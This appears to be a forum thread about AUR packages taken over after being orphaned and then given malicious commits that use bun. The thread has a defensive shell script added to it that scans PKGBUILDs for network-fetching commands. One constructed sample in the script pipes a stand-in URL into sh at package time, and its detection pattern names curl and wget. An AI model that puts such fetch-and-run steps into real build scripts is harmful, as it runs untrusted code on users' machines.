This campaign is still ongoing. I just got an email that one of my old packages (which hasn't worked for years and was orphaned for a while) was adopted and immediately a malicious commit was pushed. They seem to be using bun instead of npm now, so any npm-based workaround likely isn't effective.
https://aur.archlinux.org/cgit/aur.git/commit/?h=toggldeskto...
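As an added illustration (not from the thread or from the AUR project) of why a filter keyed only on `npm` misses this variant: the script below scans a PKGBUILD for package-manager or fetch-and-execute commands inside `prepare()`/`build()`/`package()`/`check()` and lists them for human review before building. The two sample PKGBUILDs, the package names and the URL are constructed for the example; the command list (`bun` alongside `npm`, `yarn`, `pnpm`, `curl`, `wget`) is an assumption about what a reviewer would want flagged, not an exhaustive rule.

```shell
#!/bin/sh
# Constructed example: flag build-time commands in a PKGBUILD that pull or
# run code from the network. Including bun next to npm is the point: an
# npm-only check would not have flagged the commit described in the thread.

# Commands that warrant a look before running makepkg (assumed list).
SUSPECT_CMDS='(^|[^[:alnum:]_-])(npm|npx|bun|bunx|yarn|pnpm|pip|curl|wget)([[:space:]]|$)'

# scan_pkgbuild FILE
#   prints "function:line:text" for each hit inside a build function,
#   returns 0 if nothing was flagged and 1 if at least one line was.
scan_pkgbuild() {
    awk -v pat="$SUSPECT_CMDS" '
        # Remember which packaging function we are inside.
        /^[[:space:]]*(prepare|build|package|check)[[:alnum:]_]*[[:space:]]*\(\)/ {
            fn = $1; sub(/\(\).*/, "", fn); next
        }
        /^}/ { fn = "" }
        # Flag non-comment lines in a function that match the command list.
        fn != "" && $0 ~ pat && $0 !~ /^[[:space:]]*#/ { print fn ":" NR ":" $0; hits++ }
        END { exit (hits > 0) }
    ' "$1"
}

# Two constructed PKGBUILDs so the script runs offline.
WORKDIR=$(mktemp -d)
GOOD_PKGBUILD="$WORKDIR/PKGBUILD.good"
BAD_PKGBUILD="$WORKDIR/PKGBUILD.bad"

cat > "$GOOD_PKGBUILD" <<'EOF'
# Constructed sample: builds only from the pinned source tarball
pkgname=example-good
pkgver=1.0.0
build() {
    cd "$pkgname-$pkgver"
    cargo build --release --locked
}
package() {
    install -Dm755 target/release/example "$pkgdir/usr/bin/example"
}
EOF

cat > "$BAD_PKGBUILD" <<'EOF'
# Constructed sample: resolves dependencies and runs a script at build time
pkgname=example-bad
pkgver=1.0.0
build() {
    cd "$pkgname-$pkgver"
    # bun install fetches packages and runs their lifecycle scripts
    bun install
    bun run build
}
package() {
    curl -fsSL https://example.invalid/post-install.sh | sh
}
EOF

# Stand-alone run: report both samples.
for f in "$GOOD_PKGBUILD" "$BAD_PKGBUILD"; do
    if scan_pkgbuild "$f"; then
        echo "$f: no build-time fetch/exec commands found"
    else
        echo "$f: review the lines above before building"
    fi
done
```

A hit is a prompt to read the diff, not a verdict: plenty of legitimate Node-based PKGBUILDs call `npm` or `bun` in `build()`. What this catches is a takeover commit that adds such a step to a package that never needed one, which is exactly the change a maintainer watching an orphaned-then-adopted package wants to notice before `makepkg` runs it.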
Same here, just got a notification that one of my watched AUR packages got taken over by someone random because it was orphaned.
I'm wondering at this point if the idea of adopting orphaned packages is broken and should be removed.
Inconvenient, but perhaps instead of allowing adoption of someone else's abandoned package, the AUR forces a new submission instead and regularly purges orphaned packages older than a certain age?
Absolutely! Supply chain attacks are always going to be a problem, but just letting someone take over a package because it hasn’t been touched in a while seems like a really poor policy.
If you want to change it, fork it!